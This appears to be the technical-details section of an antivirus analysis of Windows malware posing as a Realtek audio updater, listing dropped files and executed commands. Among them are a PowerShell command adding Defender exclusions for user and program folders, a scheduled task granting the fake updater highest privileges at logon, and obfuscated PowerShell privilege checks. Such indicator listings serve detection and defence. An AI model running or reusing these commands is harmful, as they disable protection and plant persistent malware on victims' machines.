Техническая информация
- <SYSTEM32>\tasks\realtek
- %APPDATA%\google\libs\g.log
- %APPDATA%\realtek\realtek high definition audio\updater.exe
- '<SYSTEM32>\cmd.exe' /c mkdir "%APPDATA%\Google\Libs\" & wmic PATH Win32_VideoController GET Name > "%APPDATA%\Google\Libs\g.log"
- '<SYSTEM32>\wbem\wmic.exe' PATH Win32_VideoController GET Name
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' <#fbkbejrtm#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([Sys...
- '<SYSTEM32>\schtasks.exe' /create /f /sc onlogon /rl highest /tn Realtek /tr "'%APPDATA%\Realtek\Realtek High Definition Audio\Updater.exe'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' <#cfdmekn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks ...
- '<SYSTEM32>\schtasks.exe' /run /tn Realtek
- '<SYSTEM32>\taskeng.exe' {D6B6BD25-8B63-4E35-9E15-E7C5CBB54872} S-1-5-21-1960123792-2022915161-3775307078-1001:dcvntnuphdq\user:Interactive:[1]